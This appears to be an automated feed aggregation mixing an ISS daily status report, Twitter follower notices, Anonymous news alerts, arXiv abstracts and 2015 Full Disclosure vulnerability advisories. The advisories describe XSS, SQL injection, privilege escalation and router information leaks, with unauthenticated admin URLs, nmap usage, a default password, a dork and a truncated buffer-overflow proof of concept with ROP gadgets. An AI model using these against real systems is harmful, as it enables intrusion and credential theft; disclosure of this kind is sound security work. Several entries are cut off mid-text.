Sprint Ultrasound:  Kelly performed his Flight Day 240 thigh and calf ultrasound scans today with assistance from Lindgren and guidance from the Sprint ground team.  Ultrasound scans are used to evaluate spaceflight-induced changes in the muscle volume. The Sprint investigation evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers during long-duration missions. Upon completion of this study, investigators expect to provide an integrated resistance and aerobic exercise training protocol capable of maintaining muscle, bone and cardiovascular health while reducing total exercise time over the course of a long-duration space flight. This will provide valuable information in support of the long term goal of protecting human fitness for even longer space exploration missions.   Fine Motor Skills:  Kornienko completed a session of the Fine Motor Skills experiment.  During the experiment he performed a series of interactive tasks on a touchscreen tablet. This investigation is the first fine motor skills study to measure long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity. Fine Motor Skills sessions completed by Kelly and Kornienko will provide data for identification of trends or variations in fine motor performance in microgravity over the duration of their year-long space mission and upon their return to earth.   EXPRESS (EXpedite the PRocessing of Experiments to Space Station) Rack 6 Laptop Software Load:  Yui supported the ongoing software updates to ISS EXPRESS Rack laptops by copying a software load to the EXPRESS Rack 6 laptop.  These software updates include enhanced security with the Windows 7 operating system, new features and support for new capabilities.   Crew Handover Conference:  Kelly, Volkov, and Kornienko conducted a video conference with Soyuz 45 Crew (Malenchenko, Kopra, and Peake) in order to pass along lessons learned. The purpose was to begin the handover process prior to the arrival on orbit through video conferences and data exchanges between the current crew and the upcoming crew.  Soyuz 45 is scheduled to launch from the Baikonur Cosmodrome on 15 December 2015.   Cygnus Robotics Onboard Trainer (ROBoT) Session 1:  Kelly, Lindgren, and Yui utilized a Robotic Trainer in order to practice nominal and off nominal Cygnus rendezvous and capture scenarios.  Orbital ATK (OA)-4 is scheduled to launch on December 3rd with rendezvous and berthing occurring December 6th.   Space Station Remote Manipulator System (SSRMS):  Today robotic ground controllers commanded the SSRMS to grapple the PMM Flight Releasable Grapple Fixture (FRGF) using Latching End Effector (LEE) B in support of the investigation into the rigidize mechanism anomaly that occurred during HTV-5 release.   Unloaded checkouts were performed on October 23rd.   Loaded checkouts were successfully performed today and the data gathered will be assessed by the team.  Then controllers performed LEE-B diagnostics on the prime string and SSRMS brake and joint diagnostics on both strings, in preparation for OA-4 capture and berthing in December.   Today’s Planned Activities All activities were completed unless otherwise noted. HMS – Optical Coherence Tomography (OCT) Setup Virus Definition File Update on Auxiliary Computer System (ВКС) Laptops USND2 – Hardware Activation Fluid Integrated Rack (FIR) – Review SPRINT – Scanning Ops Fine Motor Skills Eye Examination [Deferred] On MCC Go БД-2 Test SPRINT – Operator Assistance Photography of SM window 02, 12, and EV2 hatch glass in MRM2 FIR – ELC Hardware Setup HMS – OCT Equipment Stowage Removal of Video Equipment Used to capture БД-2 Exercise and Downlink the file Soyuz 717 Samsung Tablet Charge – start Evaluation of Orthostatic Stability with LBNP ER6 – Closeout Ops Clean Bench (CB)  Checkout WRS – Recycle Tank Fill [Deferred] JRNL – Journal Entry [Unmarked] Crew handover conference USND2 – Hardware Deactivation Disassembly of КЦП Unit (#10Ю=А805), S/N 004/СРС Health Maintenance System (HMS) – Blood Pressure Cuff Troubleshooting Fluid Integrated Rack (FIR) – Hardware Reconfiguration Symbolic Activity / r/g 0645 Express Rack Label Updates Filling (separation) EDV (KOV) No.1106 (00063570R, ФГБ1ПГО_1_111) from EDV No.1169 (00068247R, ФГБ1ПГО_1_107) for Elektron system Date and Time Synchronization on 6 RS photo cameras to the station time Repairs of SM Interior Panel 326 by Installing Overlay Panel – Day 2 Closing Lab window shutter within 3 meters of SSRMS operation ROBoT OBT  Session 1 Soyuz 717 Samsung tablet charging – end INTERACTION-2. Experiment Ops ER6 –  DVD insertion and SW load Unlatching N2 Nadir Hatch Hard Stops IMS Delta File Prep Fundoscope Exam Setup (instilling eye drops for a pupil dilation) СОЖ Maintenance WRS – Recycle Tank Fill HABIT – Experiment Ops [Unmarked] Fundoscope Setup for exam Disassembly of КЦП Unit (#10Ю=А805), S/N 004/СРС (FM) Fundoscope – Eye Exam Symbolic Activity Equipment stowage after Fundoscope Eye Imaging BLR48 – starting measurement Health Maintenance System (HMS) Profile of Mood States (POMS) Questionnaire FIR – Reconfig for nominal ops ER6 – DVD Removal from the Laptop Preparation of Reports for Roscosmos Web Site and Social Media ECON-M. Observation and Photography URAGAN Observations and Photography Installation of inserts to ease opening of SM interior panel locks (Unstow Structural Elements kit)   Completed Task List Items None   Ground Activities All activities were completed unless otherwise noted. SSRMS LEE-B Grapple of PMM FRGF and Data Gather NORS Heater Test   Three-Day Look Ahead: Wednesday, 11/25: Cygnus Robotics OBT, 44S Emergency OBT, HAPTICS-1 Ops, Port TRRJ Survey, ISS Reboost Thursday, 11/26: Crew Holiday Friday, 11/27:  RRM Transfer Cage Install, HAPTICS-1 Ops, Crew Departure Prep, Stbd CQ Cleaning, IMAX File D/L   QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Norm Trace Contaminant Control System (TCCS) Lab Full Up Trace Contaminant Control System (TCCS) Node 3 Off  

from ISS On-Orbit Status Report http://ift.tt/1Igqv8i
via IFTTT

I have a new follower on Twitter


Autokids
Позаботьтесь о безопасности и комфорте Вашего ребенка вместе с http://t.co/nqbKcYYTkE – лучшим интернет-магазином детских автокресел в Украине!

http://t.co/9YAM86YyEO
Following: 2398 - Followers: 2147

November 25, 2015 at 08:16AM via Twitter http://twitter.com/AutokidsUA

I have a new follower on Twitter


Gorde Center



Following: 1232 - Followers: 1008

November 25, 2015 at 07:58AM via Twitter http://twitter.com/GordeSchool

I have a new follower on Twitter


eatme
Ресторанный портал eatme.ua – лучший ресторанный портал, который всегда знает, чего Вы хотите.
Киев
http://t.co/w6Ws4K2WU7
Following: 2295 - Followers: 2071

November 25, 2015 at 07:45AM via Twitter http://twitter.com/eatmeua

I have a new follower on Twitter


cloudnews☁️
Today's Paper: Pictures, Videos, Latest Breaking Worldwide News
EU / US / Worldwide
https://t.co/tBqhN3ueaJ
Following: 4839 - Followers: 4673

November 25, 2015 at 07:27AM via Twitter http://twitter.com/ambassadorua

I have a new follower on Twitter


DomSporta
DomSporta является профессиональным магазином по продаже спортивного оборудования и товаров для активного отдыха.
Киев
http://t.co/1B8SjXoTaT
Following: 3442 - Followers: 2862

November 25, 2015 at 07:12AM via Twitter http://twitter.com/DomSportaua

This $10 Device Can Guess and Steal Your Next Credit Card Number before You've Received It

Imagine you have lost your credit card and applied for a fresh credit card from your bank. What if some criminal is using your new credit card before you have even received it? Yes, it's possible at least with this $10 device. Hardware hacker Samy Kamkar has built a $10 device that can predict and store hundreds of American Express credit card numbers, allowing anyone to use them for


from The Hacker News http://ift.tt/1OrDgS4
via IFTTT

I have a new follower on Twitter


OZON
The 1st all-in-one #Cybersecurity Solution designed for #eCommerce SMB. Full and immediate protection against hackers & fraudsters.
Worldwide
http://t.co/KUgvU0NDf6
Following: 1535 - Followers: 1447

November 25, 2015 at 04:45AM via Twitter http://twitter.com/ozon_io

I have a new follower on Twitter


Paw Kyhl Jensen
This is for the people who wants to follow the progress of developing TimeXtender.
Denmark
http://t.co/dVI6cS2a8U
Following: 1243 - Followers: 1206

November 25, 2015 at 04:21AM via Twitter http://twitter.com/pawkyhljensen

[FD] Celoxis <= 9.5 - Cross Site Scripting (XSS)

================================================================ Celoxis <= 9.5 - Cross Site Scripting (XSS) ================================================================ Information

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-15-020] SAP Mobile Platform 2.3 - XXE in application import

[FD] [ERPSCAN-15-019] SAP Afaria - Stored XSS

Application: SAP Afaria Versions Affected: SAP Afaria 7, probably others Vendor URL: http://SAP.com Bugs: Stored XSS Send: 18.02.2015 Reported: 18.02.2015 Vendor response: 18.02.2015 Date of Public Advisory: 11.08.2015 Reference: SAP Security Note 2152669 Author: Dmitry Chastukhin (ERPScan) Description 1. ADVISORY INFORMATION Title: SAP Afaria – Stored XSS Advisory ID: [ERPSCAN-15-019] Risk: Hight Advisory URL: http://ift.tt/1LyII0P Date published: 11.08.2015 Vendors contacted: SAP 2. VULNERABILITY INFORMATION Class: XML External Entity [CWE-79] Impact: Stored cross-site scripting, XSS, Afaria Server, Configuration Information Disclosure Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-6663 CVSS Information CVSS Base Score: 4.3 / 10 CVSS Base Vector: AV : Access Vector (Related exploit range) Network (N) AC : Access Complexity (Required attack complexity) Medium (M) Au : Authentication (Level of authentication needed to exploit) None (N) C : Impact to Confidentiality None (N) I : Impact to Integrity Partial (P) A : Impact to Availability None (N) 3. VULNERABILITY DESCRIPTION The SAP Afaria Server can be abused by attackers, allowing them to modify application content, persist the modified content without authorization, and potentially obtain authentication information of other legitimate users. 4. VULNERABLE PACKAGES SAP Afaria 7 Other versions are probably affected too, but they were not checked. 5. SOLUTIONS AND WORKAROUNDS To correct this vulnerability, install SAP Security Note 2152669 6. AUTHOR Dmitry Chastukhin (ERPScan) 7. TECHNICAL DESCRIPTION Anonymous attackers can use special request to inject a malicious JS code by sending data to the attachment (q) on xComms port (by default, 3007). 8. REPORT TIMELINE Send: 18.02.2015 Reported: 18.02.2015 Vendor response: 18.02.2015 Date of Public Advisory: 11.08.2015 9. REFERENCES http://ift.tt/1LyII0P 10. ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is the most respected and credible Business Application Security provider. Founded in 2010, the company operates globally and enables large Oil and Gas, Financial and Retail organizations to secure their mission-critical processes. Named as an ‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP Solution providers” and distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to assist in improving the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security, and provide solutions to evaluate and secure SAP and Oracle ERP systems and business-critical applications from both, cyber-attacks as well as internal fraud. Usually our clients are large enterprises, Fortune 2000 companies and managed service providers whose requirements are to actively monitor and manage security of vast SAP landscapes on a global scale. We ‘follow the sun’ and function in two hubs, located in the Palo Alto and Amsterdam to provide threat intelligence services, agile support and operate local offices and partner network spanning 20+ countries around the globe. Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security

Source: Gmail -> IFTTT-> Blogger

I have a new follower on Twitter


Scott J. Weaver, Sr.
Consulting Firm that grows Business income via Web Design SEM SMM EM Marketing sched free call via - https://t.co/1pjmwqHzrg
Midwest
https://t.co/KHJ6A89MiH
Following: 1179 - Followers: 1497

November 25, 2015 at 02:10AM via Twitter http://twitter.com/SJWeaverMARKTNG

[FD] [ERPSCAN-15-018] SAP NetWeaver 7.4 - XXE

[FD] Leak information on Huawei HG253s v2, Comtrend VG 8050 and ADB P.DGA4001N (HomeStation)

Huawei HG253s v2 Vodafone-Spain is starting to rent a new Huawei HG253v2 router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by @VicenDominguez Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet. http://IPhtml_253s/api/ntwk/WlanBasic http://IP/html_253s/api/system/diagnose_internet http://IP/html_253s/api/system/hostinfo?type=ethhost http://IP/html_253s/api/system/hostinfo?type=guesthost http://IP/html_253s/api/system/hostinfo?type=homehost http://IP/html_253s/api/system/hostinfo?type=wifihost http://IP/html_253s/api/system/wizardcfg Usage nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x Nmap scan report for x.x.x.x (x.x.x.x) Host is up (0.34s latency). PORT STATE SERVICE 80/tcp open http | http-enum-vodafone-hua253s: | SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456 | Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX Comtrend VG 8050 Telefonica-Spain is starting to rent a new Comtrend VG 8050 router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by @DaniLabs Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet. http://IP/getWifiInfo.jx http://IP/listDevices.jx http://IP/infoApplications.jx Usage nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x Nmap scan report for x.x.x.x (x.x.x.x) Host is up (0.34s latency). PORT STATE SERVICE 80/tcp open http | http-enum-telefonica-comtrend-vg-8050: | SSID: MOVISTAR_XXX | Cipher Algorithm: WPA | Password WEP: | Password WPA: gTU3NkXE44RYjuM2RrxM | Password WPA2: | Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X ADB P.DGA4001N (HomeStation) Telefonica-Spain is starting to rent a new ADB P.DGA4001N router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by @DaniLabs Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet. http://IP/getWifiInfo.jx http://IP/listDevices.jx http://IP/infoApplications.jx Add the credentials by default are admin / 1234 Usage nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x Nmap scan report for x.x.x.x (x.x.x.x) Host is up (0.34s latency). PORT STATE SERVICE 80/tcp open http | http-enum-telefonica-homestation: | SSID: WLAN_HOME | Cipher Algorithm: WEP | Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X Here the scripts http://ift.tt/1IfAA5u

Source: Gmail -> IFTTT-> Blogger

Re: [FD] LiteCart 1.3.2: Multiple XSS

Hi, These vulnerabilities are similar, as both of them are issues with the query parameter of the search. However, the issue in version 1.1.2.1 exploits this line:

This issue was fixed in version 1.2 by passing the query parameter to htmlspecialchars before passing it to sprintf. The issue in version 1.3.2 is that the query parameter is also echoed unencoded inside the title tag, which is why the POC contains . Best Curesec Research Team Am 11/18/2015 um 6:50 PM schrieb Henri Salo: > On Fri, Nov 13, 2015 at 05:07:01PM +0100, Curesec Research Team (CRT) wrote: >> 2. XSS 1 >> http://localhost/ecommerce/litecart-1.3.2/public_html/en/search?query=">>> 5. Solution >> To mitigate this issue please upgrade at least to version 1.3.3: > > This seems to be the same vulnerability as CVE-2014-7183[1] found by > Netsparker[2]. CVE-2014-7183 was fixed in version 1.2 according to the > changelog. > > 1: http://ift.tt/1I2eZx2 > 2: http://ift.tt/1vXPYkU > >

Source: Gmail -> IFTTT-> Blogger

[FD] Cross Site Scripting (XSS) 0day in SimpleViewer all versions

######################################################################################################## Cross Site Scripting (XSS) & Content spoofing in SimpleViewer all versions via remote xml payload [2015] ######################################################################################################## $$$$$$ $$ $$ $$ $$ $$ $$ __$$ __| $$ | $$ | $$ |__| $$ / __|$$ $$$$$$$$$$ $$$$$$ $$ | $$$$$$ $$ | $$ |$$ $$$$$$ $$ $$ $$ $$$$$$ $$$$$$ $$$$$$ $$ |$$ _$$ _$$ $$ __$$ $$ |$$ __$$\$$ $$ |$$ |$$ __$$ $$ | $$ | $$ |$$ __$$ $$ __$$ ____$$ $$ |$$ / $$ / $$ |$$ / $$ |$$ |$$$$$$$$ |$$$$ / $$ |$$$$$$$$ |$$ | $$ | $$ |$$$$$$$$ |$$ | __| $$ $$ |$$ |$$ | $$ | $$ |$$ | $$ |$$ |$$ ____| $$$ / $$ |$$ ____|$$ | $$ | $$ |$$ ____|$$ | $$$$$$ |$$ |$$ | $$ | $$ |$$$$$$$ |$$ |$$$$$$$ $ / $$ |$$$$$$$ $$$$$$$$$ |$$$$$$$ $$ | ______/ __|__| __| __|$$ ____/ __| _______| _/ __| _______| _________/ _______|__| $$ | $$ | __| ######################################################################################################## EAT, SLEEP, HACK, REPEAT, EAT, SLEEP, HACK, REPEAT, EAT, SLEEP, HACK, REPEAT, EAT, SLEEP, HACK, REPEAT ######################################################################################################## Vendor: http://ift.tt/1PNEhan Vulnerable application: simpleviewr.swf Vulnerability: Execution of javascript and content spoofing Version: All versions seem vulnerable with modified payloads Dork: filetype:swf intext:SimpleViewer Credits: @APT1337, @kelodymelody SimpleViewer is a free image gallery viewer which comes as a swf flash script which loads a gallery of images from a local gallery.xml file. Simpleviewer is used on hundreds of thousands of web servers by a range of different users from bloggers all the way to government. After receiveing no feed back from the developers of SimpleViewr in regards to this vulnerability and attempting to reach out to numerous effected customers of SimpleViewer again with no feed back I feel the need to disclose this vulnerability in full, publicly so that people can remove SimpleViewr from their websites. I did try to warn you... @NASA, @NYCOURTS, @IEEE, @MIT, @ACM. SimpleViewer is able to load the gallery.xml file in a number of different ways: http://www.example.com/viewer.swf The above example loads gallery.xml locally on the server http://ift.tt/1Xq1rCI The above example loads gallery.xml or another .xml file defined using the xmlDataPath variable http://ift.tt/1PNEhao The above example loads a remote gallery.xml file providing the remote server has a cross-domain policy. This can allow an attacker to include remote malicious xml files in to the SimpleViewer applicaion. SimpleViewer does not check that the gallery.xml file being loaded is stored locally within the same domain or check that the gallery.xml file being loaded is being loaded from a known/safe remote location. SimpleViewer can be forced to load remote malicious galleries providing that the server whith the remote gallery has a cross-domain policy file (crossdomain.xml). This means that an attacker can load a remote malicious xml file in to SimpleViewer which can allow an attacker to both spoof content and execute javascript within the context of the users browser. This can be used by an attacker to trick users in to logging in to a fake login page to steal login information or trick users in to downloading malicious files. Before we can exploit this vulnerability in SimpleViewr we must first create a cross-domain policy file (crossdomain.xml) which allows SimpleViewer to fetch the payload from our server. The crossdomain.xml file would consist of the following code: The above crossdomain.xml file should be placed in the webroot of the remote server where the remote gallery.xml file is located. SimpleViewr allows the user to customize their gallery using a number of different variables which are set within the gallery.xml file. Below is small list of variables that can be used within the gallery.xml file: title - Text to display as gallery title. imagePath - Relative or absolute path to images folder. thumbPath - Relative or absolute path to thumbnail images folder. backgroundImagePath - Relative or absolute path to a JPG or SWF to load as the gallery background. An example of one of these gallery.xml files can be found on simpleviewer.net which is provided as a demo which is located at the following URL: Gallery: http://ift.tt/1Xq1uhK SimpleViewer.]]>

Source: Gmail -> IFTTT-> Blogger

[FD] : CVE-2015-8298 SQL Injection Vulnerability in RXTEC RXAdmin

### RXTEC_20150513 #### Title: SQL injection vulnerability in the RXTEC RXAdmin Login Page allows remote attackers to execute arbitrary SQL commands via several HTTP parameter. #### Type of vulnerability: SQL injection ##### Attack outcome: It is possible to extract all information from the database in use by the application. Depending on the configuration of the SQL server arbitrary code execution might be possible. #### Impact: Critical #### Software/Product name: RXTEC RXAdmin Login #### Affected versions: UPDATE : 06 / 2012 #### Fixed in version: *unknown* #### Vendor: RXTEC (www.rxtec.net) #### CVE number: CVE-2015-8298 #### Timeline * `2015-04-30` identification of vulnerability * `2015-05-11` vendor contact (won't fix because of outdated version) * `2015-07-14` contact cve-request@mitre. #### Credits: Thomas Konrad `tkonrad@sba-research.org` (SBA Research) #### Description: The following parameters are affectey by the vulnerability: * /index.htm (loginpassword parameter) * /index.htm (loginusername parameter) * /index.htm (zusätzlicher parameter) * /index.htm (zusätzlicher parameter) * /index.htm (rxtec cookie) * /index.htm (groupid parameter) #### Proof-of-concept: *none*

Source: Gmail -> IFTTT-> Blogger

[FD] : CVE-2015-8299 RCE Vulnerability in the KNX management software ETS

#### Title: Remote code execution vulnerability in the KNX management software ETS #### Category/Abstract: Buffer overflow vulnerability #### Product: ETS (Engineering Tool Software) #### Affected versions: * ETS 4.1.5 (Build 3246) *no other versions tested* #### Fixed in version: *unknown* #### Vendor: KNX Association #### Impact: Critical #### CVE number: CVE-2015-8299 #### Timeline * `2013-10-11` identification of vulnerability * `2013-10-??` 1st vendor contact, no-reply of vendor on issue * `2013-07-30` 2nd vendor contact, no-reply of vendor on issue * `2013-10-06` 3rd vendor contact, no-reply of vendor on issue * `2015-07-14` contact cve-request@mitre. #### Credits: Aljosha Judmayer `ajudmayer@sba-research.org` (SBA Research) #### References: * Information on ETS: http://ift.tt/1OrmcM0 * KNX Association: http://www.knx.org/ #### Description: The vulnerability is caused by a buffer overflow in a memcpy operation when parsing specailly crafted KNXnet/IP packets in the Group messages monitor (aka. Falcon). An according proof-of-concept exploit which was tested on an affected ETS version installed on a Windows XP SP3 can be found below. The proof-of-concept exploit generates the UDP packet which triggers the vulnerability and should at least crash the application (it requires python and scapy to run). #### Proof-of-concept: Since this is just a PoC the ROP chain was not carefully selected and might require adaptation to reproduce the desired results on your system. knAx.py: ``` #!/usr/bin/env python """ ETS4 buffer overflow exploit PoC This is a Proof-of-Concept (PoC) remote exploit of a ETS4 which is currently running the monitoring software for group messages aka. "Groupenmonitor". This feature of the ETS4 runs an executable called "Falcon.exe" which is vulnerable to a buffer overflow. The vulnerable function gets called at: 0043C994 call overflow_43C743 This function, which is responsible for the overflow, is located at 0x43c743. The "memcpy" which produces the overflow gets called at: 0043C931 call memcpy Vulnerable version: ETS 4.1.5 (Build 3246) Stammdaten: Version 57, Schema 1.1 registry key: "NET Framework Setup" v2.0.50727 -version 2.2.30729 v4 -version 4.0.30319 ETS4.exe LegalCopyright: Copyright \xa9 2010-2012 KNX Association cvba, Brussels, Belgium Assembly Version: 4.1.3246.36180 InternalName: ETS4.exe FileVersion: 4.1.3246.36180 CompanyName: KNX Association cvba Comments: ETS4 Application ProductName: ETS4 ProductVersion: 4.1.3246.36180 FileDescription: ETS4 OriginalFilename: ETS4.exe Falcon.exe LegalCopyright: Copyright (C) 2000-2008 KNX Association, Brussels, Belgium InternalName: Falcon FileVersion: 2.0.5184.4346 CompanyName: KNX Association SpecialBuild: 2011.01.16 LegalTrademarks: KNX Association OLESelfRegister: ProductVersion: 2.0 FileDescription: Falcon OriginalFilename: Falcon.ex Tested on: Windows XP SP3 32bit This exploit uses return-oriented-programming techniques. The gadgets used for ROP are: ole32.dll:"0x774fdb5b","33c0c3","0x774fdb5b: xor eax, eax | 0x774fdb5d: ret | " ole32.dll:"0x77550f6f","83c064c3","0x77550f6f: add eax, 64h | 0x77550f72: ret | " ole32.dll:"0x774ff447","03c4c24e77","0x774ff447: add eax, esp | 0x774ff449: ret 774eh | " user32.dll:"0x7e467666","94c3","0x7e467666: xchg esp, eax | 0x7e467667: ret | " The exploit requires root privelages to send the crafted packet and the scapy python module! PoC and vuln. discovery by aljosha judmayer """ from struct import pack,unpack from scapy.all import * #

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2015-8300: Polycom BToE Connector v2.3.0 Privilege Escalation Vulnerability

#### Title: Polycom BToE Connector up to version 2.3.0 allows unprivileged windows users to execute arbitrary code with SYSTEM privileges. #### Type of vulnerability: Privilege Escalation ##### Exploitation vector: local ##### Attack outcome: Code execution with SYSTEM privileges. #### Impact: CVSS Base Score 6,2 CVSS v2 Vector (AV:L/AC:L/Au:S/C:C/I:C/A:N) #### Software/Product name: Polycom BToE Connector #### Affected versions: All Versions including 2.3.0 #### Fixed in version: Version 3.0.0 (Released March 2015) #### Vendor: Polycom Inc. #### CVE number: CVE-2015-8300 #### Timeline * `2014-12-19` identification of vulnerability * `2015-01-01` vendor contacted via customer * `2015-03-01` vendor released fixed version 3.0.0 * `2015-07-14` contact cve-request@mitre. #### Credits: Severin Winkler `swinkler@sba-research.org` (SBA Research) Ulrich Bayer `ubayer@sba-research.org` (SBA Research) #### References: Download secure version 3.0.0 http://ift.tt/1CDMWon #### Description: The Polycom BToE Connector Version up to version 2.3.0 allows a local user to gain local administrator privileges. The software creates a windows service running with SYSTEM privileges using the following file (standard installation path): C:\program files (x86)\polycom\polycom btoe connector\plcmbtoesrv.exe The default installation allows everyone to replace the plcmbtoesrv.exe file allowing unprivileged users to execute arbitrary commands on the windows host. #### Proof-of-concept: *none*

Source: Gmail -> IFTTT-> Blogger

Personal spaces are no longer linked and creator is anonymous

During the upgrade, for some unknown cause, all the personal space creator has changed to NULL causing the creator to be anonymous.

from Google Alert - anonymous http://ift.tt/1P86gS9
via IFTTT

Will Anonymous's war on ISIS have any effect?

Since the Paris attacks, Anonymous claims to have taken down thousands of Twitter accounts.

from Google Alert - anonymous http://ift.tt/1QHfVz9
via IFTTT

Aurora over Clouds


Auroras usually occur high above the clouds. The auroral glow is created when fast-moving particles ejected from the Sun impact the Earth's magnetosphere, from which charged particles spiral along the Earth's magnetic field to strike atoms and molecules high in the Earth's atmosphere. An oxygen atom, for example, will glow in the green light commonly emitted by an aurora after being energized by such a collision. The lowest part of an aurora will typically occur at 100 kilometers up, while most clouds usually exist only below about 10 kilometers. The relative heights of clouds and auroras are shown clearly in the featured picture from Dyrholaey, Iceland. There, a determined astrophotographer withstood high winds and initially overcast skies in an attempt to capture aurora over a picturesque lighthouse, only to take, by chance, the featured picture along the way. via NASA http://ift.tt/1IdvuGN

The Lowdown on Anonymous

Anonymous is an amorphous group of hacktivists with no single leader or power structure. Some call them heroes, others call them criminals. Can they ...

from Google Alert - anonymous http://ift.tt/1Xe43J7
via IFTTT

"Anonymous" Needs Oversight, Coordination to Pose Real Threat

Most people on the Internet have heard of Anonymous, the vigilante hacktivist group who have attacked everybody from ISIS to..

from Google Alert - anonymous http://ift.tt/1LyA6aw
via IFTTT

thebenevolentone3

Benevolent: "Characterized by or expressing goodwill or kindly feelings" EV CLASSES OF 2014. 2015. 2016. 2017. Keep on keeping on.

from Google Alert - anonymous http://ift.tt/1Xe4280
via IFTTT

Anonymous vs ISIS, Australian attorney general, NTP and DDoS exploits

Web security news this week: Anonymous vs ISIS, Australian attorney general, NTP and DDoS exploits; Hackers offer 200000 Comcast user ...

from Google Alert - anonymous http://ift.tt/1LyA9mE
via IFTTT

Tuesday, November 24, 2015

A Survey of Signed Network Mining in Social Media. (arXiv:1511.07569v1 [cs.SI])

Many real-world relations can be represented by signed networks with positive and negative links, and signed network analysis has attracted increasing attention from multiple disciplines. With the evolution of data from offline to social media networks, signed network analysis has evolved from developing and measuring theories to mining tasks. In this article, we present a review of mining signed networks in social media and discuss some promising research directions and new frontiers. We begin by giving basic concepts and unique properties and principles of signed networks. Then we classify and review tasks of signed network mining with representative algorithms. We also delineate some tasks that have not been extensively studied with formal definitions and research directions to expand the boundaries of signed network mining.



from cs.AI updates on arXiv.org http://ift.tt/1XdDmEo
via IFTTT

Approximate Probabilistic Inference via Word-Level Counting. (arXiv:1511.07663v1 [cs.AI])

Hashing-based model counting has emerged as a promising approach for large-scale probabilistic inference on graphical models. A key component of these techniques is the use of xor-based 2-universal hash functions that operate over Boolean domains. Many counting problems arising in probabilistic inference are, however, naturally encoded over finite discrete domains. Techniques based on bit-level (or Boolean) hash functions require these problems to be propositionalized, making it impossible to leverage the remarkable progress made in SMT (Satisfiability Modulo Theory) solvers that can reason directly over words (or bit-vectors). In this work, we present the first approximate model counter that uses word-level hashing functions, and can directly leverage the power of sophisticated SMT solvers. Empirical evaluation over an extensive suite of benchmarks demonstrates the promise of the approach.



from cs.AI updates on arXiv.org http://ift.tt/1If6AGI
via IFTTT

Searching for Objects using Structure in Indoor Scenes. (arXiv:1511.07710v1 [cs.CV])

To identify the location of objects of a particular class, a passive computer vision system generally processes all the regions in an image to finally output few regions. However, we can use structure in the scene to search for objects without processing the entire image. We propose a search technique that sequentially processes image regions such that the regions that are more likely to correspond to the query class object are explored earlier. We frame the problem as a Markov decision process and use an imitation learning algorithm to learn a search strategy. Since structure in the scene is essential for search, we work with indoor scene images as they contain both unary scene context information and object-object context in the scene. We perform experiments on the NYU-depth v2 dataset and show that the unary scene context features alone can achieve a significantly high average precision while processing only 20-25\% of the regions for classes like bed and sofa. By considering object-object context along with the scene context features, the performance is further improved for classes like counter, lamp, pillow and sofa.



from cs.AI updates on arXiv.org http://ift.tt/1XdDmEk
via IFTTT

Generalized Product of Experts for Automatic and Principled Fusion of Gaussian Process Predictions. (arXiv:1410.7827v2 [cs.LG] UPDATED)

In this work, we propose a generalized product of experts (gPoE) framework for combining the predictions of multiple probabilistic models. We identify four desirable properties that are important for scalability, expressiveness and robustness, when learning and inferring with a combination of multiple models. Through analysis and experiments, we show that gPoE of Gaussian processes (GP) have these qualities, while no other existing combination schemes satisfy all of them at the same time. The resulting GP-gPoE is highly scalable as individual GP experts can be independently learned in parallel; very expressive as the way experts are combined depends on the input rather than fixed; the combined prediction is still a valid probabilistic model with natural interpretation; and finally robust to unreliable predictions from individual experts.



from cs.AI updates on arXiv.org http://ift.tt/1tiGezu
via IFTTT

Context-Aware Bandits. (arXiv:1510.03164v2 [cs.LG] UPDATED)

